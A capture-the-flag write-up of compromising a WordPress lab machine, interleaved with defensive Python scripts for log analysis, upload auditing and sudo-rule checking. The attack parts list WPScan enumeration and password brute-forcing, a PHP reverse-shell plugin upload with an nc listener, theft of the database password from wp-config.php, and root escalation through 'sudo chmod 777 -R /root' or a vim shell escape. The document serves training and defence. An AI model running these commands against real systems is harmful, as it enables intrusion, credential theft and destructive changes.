Write-up

Step-by-step guide on the approach taken to pwn the machine.

Objectives

The objective is to capture both the user and root flags, demonstrating a complete system compromise.


Reconnaissance

We start by performing a port scan using Nmap:

sudo nmap -sCV -F -T5 <url>

We can see that WordPress 4.1.31 is running on port 80.

Using WPScan to enumerate users:

wpscan --url http://10.10.70.7 --enumerate u

We find the following usernames: hugo, c0ldd, and phillip.

Next, we perform a brute-force attack with WPScan:

wpscan --url http://10.10.70.7/ --usernames hugo,c0ldd,phillip --passwords /usr/share/wordlists/rockyou.txt

After a few attempts, we successfully obtain the password for the user c0ldd.
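From the defender's side, both WPScan steps above leave a distinctive trail in the web server's access log: a run of ?author=N redirects or a hit on the REST users route, followed by a burst of POST /wp-login.php requests that ends in a 302 (WordPress re-renders the form with a 200 on failure and redirects on success). The script below is an added example, not part of the original write-up; the log lines it analyses are constructed, the IP addresses and user agent string are placeholders, and the thresholds are assumptions to tune per site.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Apache/nginx "combined" access-log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Request shapes username enumeration relies on: author-ID redirects and the REST users route.
ENUM_PATTERNS = (re.compile(r"[?&]author=\d+"), re.compile(r"^/wp-json/wp/v2/users"))


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["status"] = int(rec["status"])
    return rec


def find_user_enumeration(records):
    """Map client IP -> number of username-enumeration requests it made."""
    hits = defaultdict(int)
    for r in records:
        if any(p.search(r["path"]) for p in ENUM_PATTERNS):
            hits[r["ip"]] += 1
    return dict(hits)


def find_login_bursts(records, threshold=10, window=timedelta(seconds=60)):
    """Map client IP -> details for IPs whose POST /wp-login.php rate reaches `threshold`
    inside any `window`. A 302 among the POSTs means one of the guesses succeeded."""
    by_ip = defaultdict(list)
    for r in records:
        if r["method"] == "POST" and r["path"].startswith("/wp-login.php"):
            by_ip[r["ip"]].append((r["ts"], r["status"]))
    flagged = {}
    for ip, events in by_ip.items():
        events.sort()
        start, peak = 0, 0
        for end in range(len(events)):          # sliding window over sorted timestamps
            while events[end][0] - events[start][0] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            flagged[ip] = {"peak_in_window": peak,
                           "success_seen": any(status == 302 for _, status in events)}
    return flagged


def analyze(log_text):
    records = [r for r in (parse_line(l) for l in log_text.splitlines()) if r]
    return {"enumeration": find_user_enumeration(records),
            "bruteforce": find_login_bursts(records)}


def build_sample_log():
    """Constructed log lines (not real traffic) mirroring the WPScan steps in the write-up."""
    base = datetime(2024, 3, 5, 10, 0, 0, tzinfo=timezone.utc)

    def line(ip, offset, method, path, status, ua):
        ts = (base + timedelta(seconds=offset)).strftime("%d/%b/%Y:%H:%M:%S +0000")
        return f'{ip} - - [{ts}] "{method} {path} HTTP/1.1" {status} 512 "-" "{ua}"'

    scanner, ua = "10.9.1.5", "WPScan v3.8"          # placeholder address and agent
    lines = [line(scanner, 0, "GET", "/?author=1", 301, ua),
             line(scanner, 1, "GET", "/?author=2", 301, ua),
             line(scanner, 2, "GET", "/wp-json/wp/v2/users", 200, ua)]
    # twelve failed guesses two seconds apart, then the redirect that means one succeeded
    lines += [line(scanner, 10 + 2 * i, "POST", "/wp-login.php", 200, ua) for i in range(12)]
    lines.append(line(scanner, 40, "POST", "/wp-login.php", 302, ua))
    # a legitimate editor logging in once from another address
    lines.append(line("10.9.1.22", 300, "GET", "/wp-login.php", 200, "Mozilla/5.0"))
    lines.append(line("10.9.1.22", 309, "POST", "/wp-login.php", 302, "Mozilla/5.0"))
    return "\n".join(lines)


if __name__ == "__main__":
    for ip, info in analyze(build_sample_log())["bruteforce"].items():
        print(ip, info)
```

The "success_seen" flag is what turns a noisy alert into an incident: a burst that ends in a redirect means the account behind it should be treated as compromised and its password reset. Rate limiting wp-login.php and disabling the author-ID redirect and the public users route remove most of the signal an attacker gets from these two steps.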


Gaining a Shell

Now, we access the WordPress admin panel and go to the Plugins section to manually upload a plugin.

We upload a plugin that contains a reverse shell script, such as the PentestMonkey PHP reverse shell, edited with our IP and port values.

Once uploaded, we access it via:

http://<url>/wp-content/uploads/<year>/<month>/

Before executing the reverse shell, we set up a listener on our machine:

nc -lnvp <port>

Then, we trigger the uploaded script to receive the shell.

To upgrade the shell, we use:

python3 -c 'import pty; pty.spawn("/bin/bash")'

Running whoami, we confirm we are www-data.

Our next step is to find the user flag:

find / -type f -name "user.txt" 2>/dev/null

However, we can't read the file due to permission restrictions, so we need access to the c0ldd user.

We check the WordPress config file for database credentials:

grep "DB_PASSWORD" /var/www/html/wp-config.php

The database password turns out to be the same one used for the c0ldd system account.
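Two things on the web server made the chain above possible: a PHP file could be dropped under wp-content/uploads and executed, and wp-config.php, readable by the web server account, held a database password that was also a system account's password. The audit below is an added example, not code from the original write-up: it walks a web root, flags upload files that are PHP by extension or by content (a script renamed to .jpg or .txt still carries the <?php tag), and reports whether wp-config.php is world-readable. The directory it builds for demonstration is constructed in a temporary folder and the PHP contents are inert placeholders; the extension list is an assumption about which suffixes the server's PHP handler executes.

```python
import os
import stat
import tempfile
from pathlib import Path

# Extensions a typical PHP handler executes; none of them belong under wp-content/uploads (assumed list).
EXECUTABLE_EXT = {".php", ".php5", ".php7", ".phtml", ".phar"}
PHP_TAG = b"<?php"


def scan_uploads(wp_root):
    """Return (relative path, reason) for every file under uploads that is PHP by name or by content."""
    uploads = Path(wp_root) / "wp-content" / "uploads"
    findings = []
    if not uploads.is_dir():
        return findings
    for p in uploads.rglob("*"):
        if not p.is_file():
            continue
        reason = None
        if p.suffix.lower() in EXECUTABLE_EXT:
            reason = "php-extension"
        else:
            with p.open("rb") as fh:
                head = fh.read(4096)
            if PHP_TAG in head:
                reason = "php-tag-in-content"   # script hidden behind a harmless-looking name
        if reason:
            findings.append((str(p.relative_to(wp_root)), reason))
    return sorted(findings)


def check_wp_config(wp_root):
    """Report whether wp-config.php (which holds DB_PASSWORD) is readable by every local account."""
    cfg = Path(wp_root) / "wp-config.php"
    if not cfg.is_file():
        return "missing"
    mode = stat.S_IMODE(cfg.stat().st_mode)
    if mode & stat.S_IROTH:
        return f"world-readable (mode {mode:04o})"
    return f"ok (mode {mode:04o})"


def harden_wp_config(wp_root):
    """Drop the 'other' bits so only the owner and the web server's group can read the file.
    In production the file should also be owned by root with the web server's group."""
    cfg = Path(wp_root) / "wp-config.php"
    os.chmod(cfg, 0o640)
    return check_wp_config(wp_root)


def audit(wp_root):
    return {"uploads": scan_uploads(wp_root), "wp_config": check_wp_config(wp_root)}


def make_demo_tree():
    """Constructed web root (temporary directory) reproducing the write-up's situation:
    a PHP file dropped in uploads, a renamed one, and a world-readable wp-config.php.
    The PHP contents are inert placeholders, not a working reverse shell."""
    root = Path(tempfile.mkdtemp(prefix="wpaudit_"))
    up = root / "wp-content" / "uploads" / "2024" / "03"
    up.mkdir(parents=True)
    (up / "photo.jpg").write_bytes(b"\xff\xd8\xff\xe0 image data, no php tag")
    (up / "shell.php").write_bytes(b"<?php /* placeholder */ ?>")
    (up / "notes.txt").write_bytes(b"release notes\n<?php /* placeholder */ ?>\n")
    cfg = root / "wp-config.php"
    cfg.write_text("define('DB_PASSWORD', 'constructed-example');\n")
    os.chmod(cfg, 0o644)
    return root


if __name__ == "__main__":
    demo = make_demo_tree()
    print(audit(demo))
    print(harden_wp_config(demo))
```

File modes only limit who can read the credentials; the pivot in this write-up worked because the database password was reused for a login account, and no scanner catches that. Keeping database and system passwords distinct, and configuring the web server to refuse to execute PHP under the uploads directory, closes both halves.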

Then we switch user:

su c0ldd

Now, we can successfully read the user.txt flag. (If we decode it using base64 --decode, we get a congratulatory message.)

Next, we look for root.txt:

find / -type f -name "root.txt" 2>/dev/null

Again, we lack permission to read the file — so we need to escalate privileges to root.


Privilege Escalation

Using sudo -l, we see that we can run vim, chmod, and ftp as root. The easiest escalation path is using chmod:

sudo chmod 777 -R /root
cat /root/root.txt

As an alternative method, we can escalate using vim:

sudo vim -c ':!/bin/sh'
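Either path works because the sudo policy grants root rights over programs that can do far more than their nominal job: an editor that runs commands, a permission tool that can open up /root (the chmod route above also leaves every file under /root world-writable, which is both destructive and easy to spot), and an interactive network client. The script below is an added example, not from the original write-up: it parses `sudo -l` output and flags rules that delegate such binaries or ALL. The sample output is constructed around the rights the write-up reports for c0ldd (the host name is a placeholder), and the watch list is deliberately limited to the three binaries the write-up names; an administrator would extend it for their environment.

```python
import re
from pathlib import PurePosixPath

# Binaries the write-up shows being abused from sudo. Descriptions stay at the level of the
# write-up itself; extending this set for a real audit is left to the administrator (assumption).
SHELL_CAPABLE = {
    "vim": "editor that executes commands (the write-up's vim -c escape)",
    "chmod": "rewrites permissions on any path (the write-up's chmod -R /root)",
    "ftp": "interactive network client running as root",
}

RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+?)\s*$")


def parse_sudo_l(output):
    """Parse the 'may run the following commands' section of `sudo -l` into rule dicts."""
    rules, in_rules = [], False
    for line in output.splitlines():
        if re.match(r"^User \S+ may run the following commands", line):
            in_rules = True
            continue
        if not in_rules or not line.strip():
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = {t.strip(": ") for t in m.group("tags").split(":") if t.strip()}
        for cmd in m.group("cmds").split(", "):
            rules.append({"runas": m.group("runas").strip(),
                          "nopasswd": "NOPASSWD" in tags,
                          "cmd": cmd.strip()})
    return rules


def assess(rule):
    """Return a risk reason for a rule, or None when it looks acceptable."""
    if rule["cmd"] == "ALL":
        return "unrestricted: ALL"
    binary = PurePosixPath(rule["cmd"].split()[0]).name
    if binary in SHELL_CAPABLE:
        return f"{binary}: {SHELL_CAPABLE[binary]}"
    return None


def risky_rules(output):
    """Rules from `sudo -l` output that grant a shell-capable binary or ALL, with the reason attached."""
    out = []
    for rule in parse_sudo_l(output):
        reason = assess(rule)
        if reason:
            out.append({**rule, "reason": reason})
    return out


# Constructed `sudo -l` output modelled on the rights the write-up reports for c0ldd;
# "host01" is a placeholder host name and the reboot rule is a made-up benign entry.
SAMPLE_SUDO_L = """\
Matching Defaults entries for c0ldd on host01:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User c0ldd may run the following commands on host01:
    (root) /usr/bin/vim
    (root) /bin/chmod
    (root) /usr/bin/ftp
    (root) NOPASSWD: /usr/sbin/reboot
"""

if __name__ == "__main__":
    for r in risky_rules(SAMPLE_SUDO_L):
        print(r)
```

Run the check against `sudo -l -U <user>` for each account that has any sudo entry. The fix is a policy change rather than a patch: grant only the exact commands and arguments a role needs, never a general-purpose editor or permission tool, and keep NOPASSWD for the narrowest possible set of commands.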

And that's it — machine completed.
